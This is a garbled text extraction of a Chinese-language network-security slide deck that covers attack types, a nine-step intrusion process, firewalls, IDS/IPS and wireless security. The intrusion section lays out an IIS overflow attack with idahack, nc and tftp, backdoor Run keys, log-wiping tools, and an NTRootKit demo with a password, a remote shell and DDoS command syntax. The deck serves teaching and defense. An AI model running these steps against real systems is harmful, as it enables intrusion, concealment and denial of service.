网路安全概论.ppt

1、按一下以編輯母片標題樣式,按一下以編輯母片,第二層,第三層,第四層,第五層,網路安全概論,传世,为您整理,Agenda,內容大綱,資訊安全概論,防火牆,&IDS,IPS,基本網路障礙排除,無線網路安全,Q&A,資訊安全概論,常見的攻擊行為,病毒與蠕蟲,(Worm),攻擊,後門程式與特洛伊木馬,IP,Spoofing(IP,偽造,),DOS,DDOS(,阻斷攻擊,),駭客入侵流程分析,駭客入侵九大步驟,入,侵防治,常見攻擊行為,(1),Virus&Worm,攻擊,CodeRed,Nimda,SQL Slammer,Blaster,Backdoor&Trojan,惡意網頁,popup,程式,病

2、毒郵件,peep.exe,&,peepbrowser.exe,win.ini,、,system.ini,、系統服務、,registry,常見攻擊行為,(2),IP spoofing,IP,假造攻擊,mendas,ipspoof,hunt,DOS&DDOS,拒絕服務攻擊,SYN Flood,DDOS,攻擊示意圖,駭客入侵流程分析,資料蒐集,目標掃描,弱點刺探,取得初步權限,提昇權限,進行破壞,建立後門,隱藏蹤跡、消滅證據,癱瘓目標,1.,資料蒐集,:,找出可供入侵的資源,網頁拜訪,Whois,InterNIC,TWNIC(,/,),NetworkSolutions,社交工程,DNS zone t

3、ransfer,nslookup,traceroute,or,tracert,2.,目標掃描,Tools,Ping,Nmap,SuperScan,Advanced,ip,scanner,Advanced port scanner,Icmpenum,NetScan,Tool Pro 2000,Netcat,Strobe,3.,弱點刺探,網路資源與分享,Net view,nbtstat,nbtscan,nltest,Legion,使用者與群組探查,nbtscan,nbtstat,enum,遠端登入程式,telnet,vnc,terminal,service,pcanywhere,收集資訊目的,偵測

4、目的網路的所有主機,偵測目的所提供服務,判斷目的主機服務種類,(banner grabbing),判斷目的主機之作業系統,(OS guessing),DNS,區域資料,Windows,網域之,NetBIOS,名稱及,DC,Windows,相關資料，如,user,、,group,、網卡數量、通訊協定。,4.,進行滲透：取得初步權限,密碼猜測,不安全的密碼,NTIS(,空白密碼,),administrator,adm,test.,字典攻擊法,SMBCrack,Legion,NetBIOS Audition Tool,網路監聽,cain,緩衝區溢位,(Buffer Overflow),攻擊,IIS,

5、緩衝區溢位,(Buffer Overflow),攻擊,IIS,ida,溢出漏洞的攻擊,工具：,tftpd32,idahack,nc,whoami,步驟：,Start tftpd32,進入命令提示字元模式，並切換至,idahack,所在目錄,輸入,“,idahack,欲攻擊目標,IP,欲攻擊目標之,IIS port,欲攻擊目標,OS version,代碼 欲開啟之連接,port,Nc,欲攻擊目標,IP,由,idahack,所開啟之,port,Ipconfig,/all /*,確認攻擊成功*,/,Cd,Tftp,I,發動攻擊,HOST,之,IP get,whoami.exe,Whoami,/*,確

6、認目前的使用者帳號*,/,5.,提昇權限,密碼猜測,網路監聽,密碼檔破解工具,Tools:pwdump2,L0phtCrack,John,將使用者加入管理者群組,getadmin,Sechole,鍵盤敲擊記錄,Keylogger,To find Protected Storage Service,including passwords for e-mail accounts in Microsoft Outlook,Microsoft Outlook Express,MSN Messenger,saved Internet Explorer form data.,Protected Stora

7、ge Explorer,Protected storage,passview,6.,進行破壞,竊取破壞,置換網頁,刪除資料,跳板攻擊,攻擊知名企業或政府單位,7.,建立後門,啟動的操控,HKLMSOFTWAREMicrosoftWindows,CurrentVersion,Run,RunOnce,RunOnceEx,RunServices,遠端控制,Telnet service,VNC,Terminal,services,pcanywhere,8.,隱藏蹤跡、消滅證據,關閉稽核,清除記錄,Elsave,ClearLogs,ClearIIsLog,隱藏檔案,Attrib,隱藏至,NTFS fil

8、e streaming,：,sfind,Win2k,支援，,WinXP,Win2003,不支援,LNS,：,List NTFS Streams,使用,rootkit,使用,rootkit,Tool:NTRootKit,可隱藏自身及所開的,port,，工作管理員，,netstat,an,看不到。,可進行,DDOS,攻擊,NTRootKit,攻擊演示,Victim:202.132.10.1,Attracker:131.107.100.10,在被攻擊端電腦,(Victim),執行,ntrootkit,在攻擊端電腦執行,nc,202.132.10.1 445,!PASSWORD yyt_hac111,

9、出現訊息：,Welcome to,yyt_hacs,ntrootkit,Server 1.22,version,use,?command to get command list,CMD?,CMD,getsysinfo,CMD,hidetcpport,135 :,隱藏,TCP port 135,CMD,hideudpport,135 :,隱藏,UDP port 135,CMD,openshell,C:dir,C:exit,CMDexit,出現訊息：,exit successfully,攻擊結果,check,Netstat,an,使用,fport,或,Active port,看,TCP,、,UDP

10、 135,是否開啟,使用工作管理員或,Taskinfo,看是否顯示,ntrootkit,程式,查看服務清單，是否顯示相關程式服務啟動,使用,ntrootkit,進行,DDOS,攻擊,usage:rtclient,destip,-p password-t proto-o port -y,icmp_type,-d,icmp_code,-m MTU-c Command,destip,-The computer you want to connect,password-The,ntrootkits,password,proto-The proto that,ntrootkit,will use(0:u

11、serdefined,1:icmp,2:udp,3:tcp),port-The,dest,udp,or,tcp,port which send packet,to(default,is 445,MTU-The MAX packet size the,ntrootkit,will use to send packet,icmp_type,-The,icmp,packet type which send to,server,default,is ICMP_ECHO REPLY,icmp_code,-The,icmp,packet code which send to,server,default,

12、is 0,Command-The command which you want the server to do,The,DDos,command,usage:DDOS,DDos_Destip,DDos_Destport,DDos_type,DDos_seconds,DDos_ProcCount,DDos_Destip,-The computer you want to,DDos,DDos_Destport,-The,Destport,you want to,DDos(default,is 445),DDos_type,-The,DDos,type you want to use(0:ping

13、 flood,1:udp flood,2:synflood,3:mstream,flood,default,is 0),DDos_seconds,-The seconds you want to,DDos,the,dest(default,is 150s),DDos_ProcCount,-The process count which the server use to,ddos(default,is 10),Example:,rtclient 202.132.10.1-p yyt_hac-t 1-c ddos 202.132.10.1 139 2 300 20,9.,癱瘓目標,阻斷服務,SY

14、N Flood,IP Spoofing,DDOS,郵件炸彈,Tools,Ping of death,、,land,、,teardrop,、,mailbomb,、,spam mail,入侵防治,制定安全政策,定期系統更新,安全,網路通訊,協定,定期檢查與稽核,安全設備防衛,基本快速發現及移除惡意程式方法,預防勝於治療,-,談如何防範入侵,制定安全政策,使用者帳號密碼原則,密碼長度,有意義字集,資料備份,異地備援,機房保全設施,監視設備,定期系統更新,系統與程式最小安裝與設定,關閉未使用的網路服務,iptables,安裝安全修正程式,Windows update,apt-yum,up2date,安

15、全,網路通訊,協定,資料加密,(,Data Encryption),DES,3DES,RSA,認證,(Authentication),.,htaccess,CGI,程式,稽核,(Auditing),EX.TCPWRAPP,ER,SSH,SSL,KERBEROS,PEM(Privacy Enhanced Mail),VPN,安全設備防衛,安裝安全防護程式,防毒,/,掃毒程式,防火牆,入侵偵測系統,-IDS,入侵防禦系統,-IPS,定期檢查與稽核,syslog,病毒掃描,port scan,木馬,/,後門程式掃描,Ad-Aware SE Personal,具有後門程式掃描及個人隱私記錄反追蹤移除：

16、可幫助使用者定期掃瞄自己電腦中是否有惡意程式、告程式的存在，並且讓使用者可以輕鬆移除一些記錄使用者瀏覽網頁動作的,cookie,系統網路設備,弱點掃描,基本快速發現及移除惡意程式方法,開啟,cmd.exe,，輸入利用,netstat,-an-p,tcp,指令清查異常對外通訊的應用程式。,檢查登錄編輯器（,Registry,）：清查,HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent VersionRun,等自動啟動路徑。,檢核微軟系統目錄中（路徑大多為,C:WINNTSYSTEM32,）是否存在下列異常檔案。,重新開機並注意電腦對外通訊情形。,W

17、hy,防火牆,什麼是防火牆,為什麼需要防火牆,防火牆如何管制,Firewall,種類,封包過濾防火牆,Packet filtering Firewall,效能好,易建置,Cost,低,代理伺服器防火牆,Proxy Firewall,狀態檢驗式防火牆,Stateful,Inspection Firewall,Firewall,種類,封包過濾防火牆,Packet filtering Firewall,代理伺服器防火牆,Proxy Firewall,成本高,效能差,最安全,狀態檢驗式防火牆,Stateful,Inspection Firewall,Firewall,種類,封包過濾防火牆,Packet

18、 filtering Firewall,代理伺服器防火牆,Proxy Firewall,狀態檢驗式防火牆,Stateful,Inspection Firewall,效能較好,有最大的擴展及延伸能力,安全性高,為現行防火牆主流,防火牆架構,Routing-,路由模式,NAT-,來源位址轉換模式,節省,IP Address,隱藏,Private IP,Transparent-,透通模式,簡易,網路架構變動最少,防火牆設定程序,前置階段,評估單位安全需求,擬定安全策略,購買經費,?,建置階段,完成階段,防火牆設定程序,前置階段,建置階段,公司,Server IP,及開放服務列表,Server Loc

19、ation,決定架構,完成階段,防火牆設定程序,前置階段,建置階段,完成階段,驗證,policy,製作操作手冊,Security Policy,安全政策的調校,組織單位網路環境完整熟析,Policy,愈簡潔愈好,Policy Loading Match,優先順序,防火牆進階應用,Radius,Kerberos,等認證,虛擬私人網路（,VPN,）,叢集負載平衡等功能,防範入侵和蠕蟲攻擊,選購,Firewall,須注意事項,符合企業組織需求,?,安全性,?,建置成本,?,管理功能,?,執行效率及效能,?,擴充性,?,事件紀錄和警告,?,附加其他的事件報告軟體,?,防火牆的限制,易成架構上之瓶頸,無

20、法,管制內部使用者破壞行為,無法有效阻止開後門的行為,無法有效阻止針對作業系統漏洞進行的入侵行為,防火牆不提供資料完整性驗證的功能,入侵偵測系統的基本組成,監控方法,-,資訊來源,主機型（,host-based,HIDS,）,網路型（,network-based,NIDS,）,分析架構,反應機制,入侵偵測系統的基本組成,監控方法（資訊來源）,分析架構,Signature-Base Detection,Protocol-Anomaly Detection,反應機制,入侵偵測系統的基本組成,監控方法（資訊來源）,分析架構,反應機制,Action,report,IDS&IPS,高度可信正常流量,-,

21、允許通過,高度可信攻擊流量,-,阻擋,不明流量,-,紀錄或警示,(,入侵偵測,),入侵防護不能阻擾日常營運,基本網路障礙排除,找出問題,pc,或,主機,網路設備,log,Firewall log,auditin,網路拔線測試,Sniffer,netxray,網路監聽軟體,判斷問題原因,&,排除,worm,virus,.etc.,Network looping,無線網路安全,無線網路安全機制,使用者認證,(Authentication),資料保密,(Confidentiality),資料完整確認,(,Interity,),第三者介入,通訊劫奪,無線網路安全,無加密認證,-SSID,開放系統認證,封閉系統認證,加密認證,WEP(wired,equivalent privacy),對稱式加密系統,增進無線網路安全的方法,修改預設的設定,預設密碼,Snmp,string,預設,SSID,預設的通訊頻道,修改網路設定,網路卡號管理,防火牆區隔網段,802.1X,使用者認證,網路嵌入式伺服晶片簡介,更方便管理,圖形管理介面,更加安全,SSL,SSH,多元化服務,MAIL,DNS,WWW,FTP,NAT,MYSQL,Openwebmail,Samba,proxy,etc,Reference,木馬防護全攻略，程秉輝，上奇,